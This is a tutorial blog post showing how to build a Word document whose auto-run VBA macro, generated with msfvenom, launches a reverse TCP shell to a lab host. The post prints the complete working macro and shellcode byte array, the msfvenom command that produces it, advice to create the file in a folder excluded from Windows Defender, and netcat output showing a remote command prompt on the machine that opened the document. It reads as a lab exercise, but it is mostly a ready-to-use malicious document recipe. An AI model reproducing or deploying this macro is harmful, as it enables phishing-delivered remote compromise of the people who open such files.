Building a Word document that launches a connect-back shell with Metasploit
In "Building a Word document that launches the calculator", we created a Word document that launched the calculator with a simple VBA macro. Because VBA macros can call Win32 APIs, it is possible to write a macro that executes arbitrary shellcode. Here we build a Word document that launches a connect-back shell using the Metasploit Framework.
Environment
Kali Linux 2.0, Metasploit Framework 4.11.4
root@vm-kali64:~# uname -a
Linux vm-kali64 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux
root@vm-kali64:~# lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description: Kali GNU/Linux 2.0
Release: 2.0
Codename: sana
root@vm-kali64:~# msfconsole -v
Framework Version: 4.11.4-2015071403
Generating a VBA macro with Metasploit
Metasploit can emit shellcode in VBA format, and that output can be used as-is as an Office macro.
First, use the msfvenom command to look up the payload name and the options it accepts.
root@vm-kali64:~# msfvenom --help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Options:
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
-f, --format <format> Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder <encoder> The encoder to use
-a, --arch <arch> The architecture to use
--platform <platform> The platform of the payload
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars <list> The list of characters to avoid example: '\x00\xff'
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out <path> Save the payload
-v, --var-name <name> Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message
root@vm-kali64:~# msfvenom -l
Framework Payloads (432 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
...
windows/shell_reverse_tcp Connect back to attacker and spawn a command shell
...
root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp --payload-options
Options for payload/windows/shell_reverse_tcp:
Name: Windows Command Shell, Reverse TCP Inline
Module: payload/windows/shell_reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 324
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
sf <stephen_fewer@harmonysecurity.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Advanced options for payload/windows/shell_reverse_tcp:
(snip)
Based on the results above, generating a VBA macro that connects back to port 4444 on 192.168.56.4 looks like this.
root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.4 LPORT=4444 EXITFUNC=thread -f vba
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As LongPtr, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As LongPtr, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As Long, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As Long, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As Long
#EndIf
Sub Auto_Open()
Dim Ewtoup As Long, Qkhfci As Variant, Kdhhfhp As Long
#If Vba7 Then
Dim Hhluw As LongPtr, Lgcpy As LongPtr
#Else
Dim Hhluw As Long, Lgcpy As Long
#EndIf
Qkhfci = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1, _
199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81, _
139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _
207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36, _
1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36, _
91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,51,50,0, _
0,104,119,115,50,95,84,104,76,119,38,7,255,213,184,144,1,0,0,41, _
196,84,80,104,41,128,107,0,255,213,80,80,80,80,64,80,64,80,104,234, _
15,223,224,255,213,151,106,5,104,192,168,56,4,104,2,0,17,92,137,230, _
106,16,86,87,104,153,165,116,97,255,213,133,192,116,12,255,78,8,117,236, _
104,240,181,162,86,255,213,104,99,109,100,0,137,227,87,87,87,49,246,106, _
18,89,86,226,253,102,199,68,36,60,1,1,141,68,36,16,198,0,68,84, _
80,86,86,86,70,86,78,86,86,83,86,104,121,204,63,134,255,213,137,224, _
78,86,70,255,48,104,8,135,29,96,255,213,187,224,29,42,10,104,166,149, _
189,157,255,213,60,6,124,10,128,251,224,117,5,187,71,19,114,111,106,0, _
83,255,213)
Hhluw = VirtualAlloc(0, UBound(Qkhfci), &H1000, &H40)
For Kdhhfhp = LBound(Qkhfci) To UBound(Qkhfci)
Ewtoup = Qkhfci(Kdhhfhp)
Lgcpy = RtlMoveMemory(Hhluw + Kdhhfhp, Ewtoup, 1)
Next Kdhhfhp
Lgcpy = CreateThread(0, 0, Hhluw, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
In the output above, everything from #If Vba7 Then onward is the generated macro.
This macro runs at the moment the document is opened.
Specifically, it places the shellcode in memory with VirtualAlloc and RtlMoveMemory, then executes it on a new thread with CreateThread.
Note that EXITFUNC=thread is specified at generation time: with the default EXITFUNC=process, the end of the shellcode would terminate the Word process itself rather than just the injected thread.
Building a Word document with the macro embedded
Create a Word document containing the macro above in the same way as in "Building a Word document that launches the calculator". Note that this file is detected by Windows Defender as TrojanDownloader:O97M/Donoff.gen!A, so it has to be created inside a folder excluded from Windows Defender.
With nc listening on port 4444 of 192.168.56.4, opening the Word document and enabling macros produces the following.
root@vm-kali64:~# nc -v -l -p 4444
listening on [any] 4444 ...
192.168.56.1: inverse host lookup failed: Unknown host
connect to [192.168.56.4] from (UNKNOWN) [192.168.56.1] 58116
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>whoami
whoami
target-win8\user

C:\Users\user\Desktop>^C
The output above confirms that the command prompt of the machine that opened the Word document can be operated remotely.